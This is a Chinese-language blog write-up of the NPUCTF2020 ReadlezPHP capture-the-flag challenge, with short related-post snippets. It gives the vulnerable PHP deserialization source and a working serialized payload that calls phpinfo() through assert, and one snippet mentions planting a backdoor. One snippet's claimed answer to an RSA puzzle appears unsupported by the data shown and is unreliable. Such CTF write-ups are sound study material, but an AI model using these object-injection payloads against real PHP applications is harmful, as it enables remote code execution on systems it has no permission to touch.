[NPUCTF2020]ReadlezPHP

最新推荐文章于 2024-03-28 20:38:17 发布
最新推荐文章于 2024-03-28 20:38:17 发布
阅读量504 收藏
点赞数
分类专栏: CTF题目(web) 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52907838/article/details/119174455
版权

打开环境,没有发现,最后在源码中找到:

 点击跳转得到源码:

<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp;

if(isset($_GET['source']))
{
    highlight_file(__FILE__);
    die(0);
}

@$ppp = unserialize($_GET["data"]);


2021-07-28 02:57:35

 分析代码创建了一个类,其中有两个变量:a,b;初始赋值为a = "Y-m-d h:i:s";b = "date";一看就知道是用date函数显示时间,最后结束以echo $b($a);的形式执行语句,也就是说如果将$b赋值为函数,$a赋值为命令,就能执行我们想执行的命令。

看到最后是@$ppp = unserialize($_GET["data"]);意思是要GET传入序列化后的值,我们就执行一下phpinfo()构造:

 传入后还是只显示了时间,说明system函数应该是被过滤处理了,那就用其他的函数,经过尝试发现assert函数能用,那么传入:?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}

执行成功,在页面搜索flag就得到了答案:

Kevin_xiao~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[NPUCTF2020]ReadlezPHP【web系列】
shutTD的博客
10-05 421
打开题目发现是一个帅帅的界面发现没什么有用的,那就f12康康有什么有用的,仔细查看每一个标签发现有一个网址我们跟着点进去一看发现是一段源代码,那这里就是解题的入口了看到就知道这道题是php反序列化了,所以接下来就是php反序列化做题流程。这题反序列化链很短,入口即终点,我们跟进发现那么这里就是个危险函数了也是我们的解题的最终步骤,在这里我们就需要认识一个函数了。
第五十九题——[NPUCTF2020]ReadlezPHP
分享简单的安全技术
05-08 322
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,按f12查看源码,看到一个跳转提示:/time.php?source 第二步:查看time.php界面,发现源代码 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s";
web:[NPUCTF2020]ReadlezPHP
sleepywin的博客
11-27 324
并在构造函数中将它们分别初始化为字符串 "Y-m-d h:i:s" 和 "date"。函数将当前文件的源代码高亮显示并输出,然后终止程序。然后,通过判断 GET 请求中是否包含参数。符号将可能产生的错误屏蔽,防止错误信息泄露。这段代码是一个简单的 PHP 类,名为。,它在对象销毁时被调用。猜测可能是过滤了部分函数,尝试用别的。发现一个网址,访问这个页面查看。参数反序列化为对象,并使用。没发现其他的线索,查看源代码。函数将 GET 请求中的。类中还定义了一个析构函数。之后的代码中,创建了一个。
[NPUCTF2020]Baby Obfuscation.exe.i64
06-02
Baby Obfuscation分析过程
解读“模块的沟通”
08-04
在数字电路设计中,尤其是使用硬件描述语言如Verilog进行设计时,模块间的通信是非常关键的一个环节。这里的“模块的沟通”是指不同模块之间通过信号交互来传递信息和协调操作的过程。本文将深入探讨这一概念,并以...
flash涂鸦板
12-10
简单易操作 一木了然 而且能让你快速体验到FLASH的操作乐趣 让你有想去学的冲动 而且能让你快速掌握简单操作
obfuscation
05-11
obfuscation 基于Allatori的Java代码混淆工具 使用Allatori混淆工具写的一个Maven插件 mvn install此项目,然后在想要混淆的项目的pom文件中引入此插件,并指定配置文件全路径以及要混淆的类所在路径即可使用 ...
ctf php沙箱,详谈CTF中常出现的PHP反序列化漏洞
weixin_39968724的博客
03-16 1003
0x01什么是PHP序列化与反序列化PHP序列化是一种把变量或对象以字符串形式转化以方便储存和传输的方法在PHP中,序列化用于存储或传递 PHP 的值的过程中,同时不丢失其类型和结构。比方来说,我现在有一个类,我需要通过接口进行数据传输,或存储至数据库中以备将来使用,同时又想保持其结构,让接收方接收或数据库读数据时恢复其原来的结构,就需要通过序列化将对象按照一定格式转化为字符串的形式来进行传输简单...
反序列化&动态调用 [NPUCTF2020]ReadlezPHP1
最新发布
m0_75178803的博客
03-28 1002
在源代码上看到提示访问一下看看代码审计一下和执行漏洞:echo $b($a);在__destruct()方法里面有 echo $b($a);这个是php的特性,php可以通过这种方法动态调用方法我们可以利用这个特性弄一个后门代码如下成功蚁剑连接一下但是进去却什么都没有那我们修改代码,改去访问phpinfo成功访问。
[NPUCTF2020]ReadlezPHP 反序列化简单反序列
m0_64180167的博客
09-19 411
所以我们可以使用其他命令执行 函数 例如 assert。这里还要fuzz一下 因为system不能执行。看看执行主要是 echo $b($a)那就是$b是命令 $a是参数。
NPUCTF2020]ReadlezPHP
shannidawang的博客
08-10 127
考点:反序列化 查看源码 源码 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } public function __destruct(){ $a = $this-&
[NPUCTF2020]ReadlezPHP 1
plant1234的博客
04-16 666
[NPUCTF2020]ReadlezPHP 1 首先打开题目,通过查看源码发现: 发现time.php页面访问得到: 请求source看看得到: 得到源码: <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "d
[NPUCTF2020]ReadlezPHP 1[b(a)]
weixin_45577185的博客
10-16 142
f12发现了令一个网页,打开 发现代码,开始审计 __destruct()魔术方法: 属性b包裹住属性a 利用assert()函数 assert 判断一个表达式是否成立 assert()可以将整个字符串参数当作php参数执行。 构造反序列化 由b(a)可以构造b=assert,a=phpinfo ->assert(phpinfo()) 反序列化构造 payload:?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert"
刷题记录-NPUCTF2020(web部分)
weixin_43610673的博客
05-03 4867
在buu刷了一遍,题目好顶,还剩一题EzShiro摸不出来 ReadlezPHP 禁用了右键查看源代码 view-source: 自行加上前缀即可 打开链接/time.php?source 很明显,php反序列化,通过echo b(b(b(a); 写入shell,system等被禁用,用assert(断言) <?php class HelloPhp { public $a; ...
从以下代码中找到被藏起来的e,提示:在代码注释中。from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) e = # Hidden q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ''' 169169912654178 128509160179202 518818742414340 358553002064450
07-16
根据提示,在代码注释中可以找到隐藏的 `e` 值。以下是给定代码的修改版本,以显示隐藏的 `e` 值: ```python from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) # Hidden e = 65537 q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ``` 在修改后的代码中,我们将 `e` 的值设置为 65537。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kevin_xiao~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值